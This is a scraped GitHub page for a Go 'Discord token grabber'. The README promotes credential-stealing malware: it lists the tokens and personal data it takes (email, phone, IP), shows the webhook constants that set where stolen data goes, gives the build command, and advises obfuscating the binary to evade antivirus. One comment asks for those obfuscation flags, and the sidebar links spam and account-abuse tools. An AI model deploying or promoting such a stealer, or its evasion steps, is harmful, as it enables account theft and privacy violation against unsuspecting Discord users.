Discord token grabber written in go please read the liability disclaimer before using it

Discord Token Grabber Written in Go !

Liability Disclaimer

The use of this software on any device that is not your own is highly discouraged. You need to obtain explicit permission from the owner if you intend to use this program in an environment you don't own, any illicit installation will likely be prosecuted by the jurisdiction the (ab)use occurs in.

Creators shall not be liable for any indirect, incidental, special, consequential or punitive damages, or any loss of profits or revenue, whether incurred directly or indirectly, or any loss of data, use, goodwill, or other intangible losses, resulting from:

  • (i) your access to this resource and/or inability to access this resource
  • (ii) any conduct or content of any third party referenced by this resource, including without limitation, any defamatory, offensive or illegal conduct or other users or third parties
  • (iii) any content obtained from this resource

Features:

  • Send Informations via discord webhook
  • Checks for Discord (Canary, PTB) tokens, Google Chrome, Brave Browser, Yandex Browser and Opera Browser
  • Checks whether the token(s) is valid before sending it to avoid disabled tokens
  • Check whether or not discord account has nitro
  • Get Also: Email, Phone, Account display name, CPU Arch, OS, IP

preview

Usage:

Install Go: https://golang.org/dl

Simply change these variables value the main.go file by yours:

const (
	WebhookUrl       = "YOUR_WEBHOOK_URL"
	WebhookAvatarUrl = "YOUR_WEBHOOK_IMG" //Webhook img
	WebhookUsername  = "YOUR_WEBHOOK_NAME" // Webhook name
	Debug = false // For a console output
)

Then simply compile the main.go file !

go build main.go

You should probably obfuscate or pack the executable file to avoid being detected by AVs.

Contributing

Since it was my first go program there is things that can be refactored for sure, don't hesitate to let me know

Owner
faceslog
🚀 Uni Student - Learning Reverse Engineering, Malware Analysis
faceslog
Similar Resources

An extension for discordgo to create a Discord bot quickly using the Builder pattern.

botbuilder An extension for discordgo to create a Discord bot quickly using the Builder pattern. Example usage: package main import ( "log" "os"

Oct 12, 2022

A Discord clone using React and Go

Valkyrie A Discord clone using React and Go. Live Demo Notes: File Upload is dis

Dec 19, 2021

Feline-bot - Feline Bot for Discord using Golang

Feline Bot for Discord Development This bot is implemented using Golang. Feature

Feb 10, 2022

An easy-to-use discord bot written in go

Discord Bot An easy-to-use discord bot template written in golang using discordgo. This template was written for learning golang. It will be updated a

Jan 23, 2022

discord exploit tools written in golang

The ultimate CLI tool for TiKV

Aug 19, 2021

A tool written in GO to demonstrate how bad actors utilize requests to spam Discord Users and launch large unsolicited DM Advertisement Campaigns

A tool written in GO to demonstrate how bad actors utilize requests to spam Discord Users and launch large unsolicited DM Advertisement Campaigns

discord-mass-DM-GO A tool written in GO to demonstrate how bad actors utilize requests to spam Discord Users and launch large unsolicited DM Advertise

Jan 2, 2023

Discord Bot written in Go. Created for 'Intro to Golang', Fall 21

goDiscordBot Discord Bot written in Go. Created for 'Intro to Golang', Fall 21 Session where we coded the bot (goes over setup steps): https://gdsc.co

Nov 3, 2021

Fastest light-weight Discord server joiner written in GO

Fastest light-weight Discord server joiner written in GO

DiscordInviterGO! Fastest light-weight Discord server joiner written in GO Disclaimer For Educational purposes only. Use at your own risk. Automation

Jan 3, 2023

Discord Nitro sniper Written in Golang

Discord Nitro sniper Written in Golang

Discord Nitro sniper Written in GO lang 👋 Wow this looks like Slows Sniper Maybe the same src 😲 Features Multiple accounts support to claim on one m

Jan 10, 2022
Comments
  • How to obfuscate go build

    How to obfuscate go build

    # You can avoid this by using specific config flags that I won't provide here !

    Can you provide them in my telegram then? PandoricG I will really appreciate it!

  • Revert

    Revert "Edge, not Edg"

    Reverts faceslog/discord-grabber-go#3

    I'm braindead it's really Edg I was disturbed

    User Agent List: https://techblog.willshouse.com/2012/01/03/most-common-user-agents/

  • Bypass Discord Encryption Windows

    Bypass Discord Encryption Windows

    Since the new Discord Update, discord encrypts the token on Windows using WinApi specific functions and AES GCM. It means that the token grabber is now platform dependant. The code on this current branch is designed for Windows Systems. If you wish to use it for Linux & MacOS, please checkout the Unix branch

✨ Fastest Feature-packed Discord Token Checker written in GO ✨
✨ Fastest Feature-packed Discord Token Checker written in GO ✨

FAST-discord-token-checker ✨ Fastest Feature-packed Discord Token Checker written in GO ✨ Overview ?? This program is the fastest ever written Discord

Dec 29, 2022
discord bot that plays music in a voice channel discord

Music discord bot by serje3 Description A bot written in the Golang language plays music on your server's voice channel on Discord. It can be built an

Nov 17, 2021
A simple Discord bot developed for the Bedrock Gophers discord server.

Bedrock Gopher A simple Discord bot developed for the Bedrock Gophers discord server. Click here to invite the bot to your guild. You will also need t

Mar 12, 2022
Discord-dl: a tool to archive discord channels

discord-dl discord-dl is a tool to archive discord channels. I think it's safe t

May 18, 2022
Discord-notif - Send notifications to discord in Your pipelines or scripts
Discord-notif - Send notifications to discord in Your pipelines or scripts

discord-notif Send notifications to discord in Your pipelines or scripts install

Dec 15, 2022
Discord-finder - The back-end for retrieving information about people on discord
Discord-finder - The back-end for retrieving information about people on discord

About This is the backend application for Discord Finder, it allows you to retrive information about people on discord just like the discord lookup we

Jan 4, 2022
Discord-bot - A Discord bot with golang

JS discord bots Install Clone repo git clone https://github.com/fu-js/discord-bo

Aug 2, 2022
Wipe-discord - TUI application to erase Discord messages
Wipe-discord - TUI application to erase Discord messages

wipe-discord Terminal user interface (TUI) application to delete Discord message

Aug 21, 2022
An easy-to-use discord bot template written in golang using discordgo

Discord Bot An easy-to-use discord bot template written in golang using discordgo. This template was written for learning golang. It will be updated a

Oct 30, 2021
Golang bot that connects to slack using Socketclient to read and write messages.
Golang bot that connects to slack using Socketclient to read and write messages.

?? (not)simple go project ?? Golang bot that connects to slack using Socketclient to read and write messages. ?? Use ?? @SquidBot : Mentions your name

Aug 23, 2022